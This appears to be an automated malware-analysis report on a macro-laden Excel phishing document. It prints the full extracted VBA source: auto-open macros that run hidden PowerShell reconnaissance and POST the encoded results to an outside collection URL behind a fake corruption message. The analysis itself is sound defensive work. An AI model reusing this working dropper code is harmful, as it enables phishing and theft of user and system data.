MALICIOUS (Risk Score: 394)

Malware Insights

MITRE ATT&CK: T1059.001 PowerShell; T1059.005 Visual Basic; T1566.001 Spearphishing Attachment
This Excel document contains VBA macros that are designed to execute PowerShell commands. The macros attempt to gather basic system information, IP configuration, and environment variables. The collected data is then sent to the URL http://osiris.compass-security.com/phishing/collect.php. The presence of AutoOpen and Document_Open macros indicates it's likely delivered as a spearphishing attachment.
Heuristics (13)

- ClamAV: Doc.Dropper.Agent-6418305-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6418305-0
- VBA macros detected (medium, OLE_VBA_MACROS, 8 related findings): Document contains VBA macro code
- WScript.Shell usage (critical, OLE_VBA_WSCRIPT). Matched line in script: `tmpOutFile = createTempFile() Set wsh = CreateObject("WScript.Shell") pscmd = "PowerShell " & Chr(34) & myCmd & " | out-file -encoding utf8 " & tmpOutFile & Chr(34)`
- PowerShell reference in VBA (critical, OLE_VBA_PS). Matched line in script: `''' ------------------------------- ''' myCmd = "<powershell command>" ''' output = RunPowershellCmd(myCmd)`
- CreateObject call (high, OLE_VBA_CREATEOBJ). Matched line in script: `Set HttpReq = CreateObject("MSXML2.XMLHTTP") ' change path to collection script here`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN). Matched line in script: `Public Sub AutoOpen() submit_mode = "auto"`
- Document_Open macro (low, OLE_VBA_DOCOPEN). Matched line in script: `Public Sub Document_Open() submit_mode = "auto"`
- Auto_Open macro (low, OLE_VBA_AUTO). Matched line in script: `Public Sub Auto_Open() submit_mode = "auto"`
- Environ() call (env variable access) (low, OLE_VBA_ENVIRON). Matched line in script: `hostname = Environ("computername") username = Environ("username")`
- Reference to PowerShell (high, SC_STR_POWERSHELL)
- Reference to Windows Script Host (high, SC_STR_WSCRIPT)
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://osiris.compass-security.com/phishing/collect.php (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7832 bytes |

SHA-256: b369da19614fd601c7ffceafd35b9405e319d0f6a6e9de2a2676c93b48b6494d

Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "Module1"
' TODO
' Change the hardcoded fileID in the Exploit() function
' Adjust the executed PS commands in the Exploit() function as necessary
' Adjust the URL of the collection script in the Request() function
' Adjust the language of the displayed messages
Public submit_mode As String
Public runID As String
Public fileID As String
Private Sub CommandButton1_Click()
submit_mode = "click"
Call Exploit
End Sub
Public Sub Document_Open()
submit_mode = "auto"
Call Exploit
End Sub
Public Sub Auto_Open()
submit_mode = "auto"
Call Exploit
End Sub
Public Sub AutoOpen()
submit_mode = "auto"
Call Exploit
End Sub
Public Sub AutoExec()
submit_mode = "auto"
Call Exploit
End Sub
Function Exploit()
' executed attacks are defined here. add more commands using the template below
''' template for PS command
''' -------------------------------
''' myCmd = "<powershell command>"
''' output = RunPowershellCmd(myCmd)
''' Call Request(output, "<label>")
''' -------------------------------
On Error GoTo Err2:
Dim myCmd As String
Dim output As String
' generate a random ID to identify connected requests
runID = RandomString(32)
' hardcoded ID to identify source document of requests
fileID = "contentfiltercheck"
' Basic information gathering without PowerShell
Call Request(BasicInfo(), "BasicInfo")
' Get ip configuration with PS
myCmd = "Get-NetIPConfiguration"
output = RunPowershellCmd(myCmd)
Call Request(output, "ipconfig")
' Get environment variables with PS
myCmd = "Get-ChildItem Env:"
output = RunPowershellCmd(myCmd)
Call Request(output, "env_vars")
' Get local user accounts with PS
myCmd = "Get-WmiObject -Class Win32_UserAccount -Filter 'LocalAccount=True' | Select PSComputername, Name, Status, Disabled, AccountType, Lockout, PasswordRequired, PasswordChangeable, SID "
output = RunPowershellCmd(myCmd)
Call Request(output, "local_users")
' Get connected volumes/shares with PS
myCmd = "Get-WmiObject -class win32_logicaldisk"
output = RunPowershellCmd(myCmd)
Call Request(output, "local_volumes")
' Show corruption message and close document
MsgBox "The document is corrupted and cannot be opened.", vbOKOnly
ActiveDocument.Close SaveChanges:=wdDoNotSaveChanges
Exit Function
Err2:
MsgBox "An unknown error occurred.", vbCritical, "Unknown error"
End Function
Function Request(data As String, Optional label As String = "n/a")
Dim outBytes() As Byte
Dim encOutput As String
On Error GoTo Err1:
' base64 encode data to be transmitted
outBytes = data
encOutput = Replace(EncodeBase64(outBytes), Chr(10), "")
Dim HttpReq As Object
Set HttpReq = CreateObject("MSXML2.XMLHTTP")
' change path to collection script here
HttpReq.Open "POST", "http://osiris.compass-security.com/phishing/collect.php", False
HttpReq.SetRequestHeader "Content-Type", "application/x-www-form-urlencoded"
HttpReq.send "fileID=" & fileID & "&runID=" & runID & "&data=" & label & ":" & encOutput & "&mode=" & submit_mode
RequestWin = HttpReq.responseText
Exit Function
Err1:
MsgBox "An unknown error occurred.", vbCritical, "Unknown error"
End Function
Public Function createTempFile() As String
' create a temporary file to store command output
Dim tmpFolder, tmpName, tmpFile, fso
Set fso = CreateObject("Scripting.FileSystemObject")
Set tmpFolder = fso.GetSpecialFolder(2)
tmpName = fso.GetTempName
Set tmpFile = tmpFolder.CreateTextFile(tmpName)
tmpFile.Close
createTempFile = tmpFolder & "\" & tmpName
End Function
Public Function getOutput(ByVal tmpOutFile As String) As String
' retrieve command output from temporary file
Dim tmpFile, fso
Set fso = CreateObject("Scripting.FileSystemObject")
Set tmpFile = fso.OpenTextFile(tmpOutFile, 1, False, -1)
getOutput = tmpFile.readall
tmpFile.Close
End Function
Public Function BasicInfo() As String
' collect basic information without PS, should work on all systems
Dim hostname As String
Dim username As String
hostname = Environ("computername")
username = Environ("username")
BasicInfo = "pc:" & hostname & ";user:" & username
BasicInfo = CStr(StrConv(CStr(BasicInfo), vbFromUnicode))
End Function
Public Function RunPowershellCmd(myCmd As String) As String
' execute given powershell command, store output in a temporary file and return output from there
Dim wsh As Object
Dim ret
Dim strOutput, tmpOutFile, pscmd As String
tmpOutFile = createTempFile()
Set wsh = CreateObject("WScript.Shell")
pscmd = "PowerShell " & Chr(34) & myCmd & " | out-file -encoding utf8 " & tmpOutFile & Chr(34)
ret = wsh.Run(pscmd, 0, True)
strOutput = getOutput(tmpOutFile)
RunPowershellCmd = strOutput
End Function
Public Function BASE64SHA1(ByVal sTextToHash As String)
' base64 encode data and then hash it with sha1
Dim asc As Object
Dim enc As Object
Dim TextToHash() As Byte
Dim SharedSecretKey() As Byte
Dim bytes() As Byte
Const cutoff As Integer = 5
Set asc = CreateObject("System.Text.UTF8Encoding")
Set enc = CreateObject("System.Security.Cryptography.HMACSHA1")
TextToHash = asc.GetBytes_4(sTextToHash)
SharedSecretKey = asc.GetBytes_4(sTextToHash)
enc.Key = SharedSecretKey
bytes = enc.ComputeHash_2((TextToHash))
BASE64SHA1 = EncodeBase64(bytes)
'BASE64SHA1 = Left(BASE64SHA1, cutoff)
Set asc = Nothing
Set enc = Nothing
End Function
Public Function EncodeBase64(ByRef arrData() As Byte) As String
' base64 encode data
Dim objXML As Object
Dim objNode As Object
Set objXML = CreateObject("MSXML2.DOMDocument")
Set objNode = objXML.createElement("b64")
objNode.DataType = "bin.base64"
objNode.nodeTypedValue = arrData
EncodeBase64 = objNode.Text
Set objNode = Nothing
Set objXML = Nothing
End Function
Public Function decodeBase64(ByVal strData As String) As Byte()
' base64 decode data
Dim objXML As Object
Dim objNode As Object
Set objXML = CreateObject("MSXML2.DOMDocument")
Set objNode = objXML.createElement("b64")
objNode.DataType = "bin.base64"
objNode.Text = strData
decodeBase64 = objNode.nodeTypedValue
Set objNode = Nothing
Set objXML = Nothing
End Function
Public Function RandomString(l As Integer) As String
' generate a random string (lowercase/uppercase/digits) of length l
Randomize
Dim rndStr As String
rndStr = "abcdefghijklmnopqrstuvwxyz"
rndStr = rndStr & UCase(rndStr) & "0123456789"
Dim i As Long
For i = 1 To l
RandomString = RandomString & Mid$(rndStr, Int(Rnd() * Len(rndStr) + 1), 1)
Next
End Function
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
```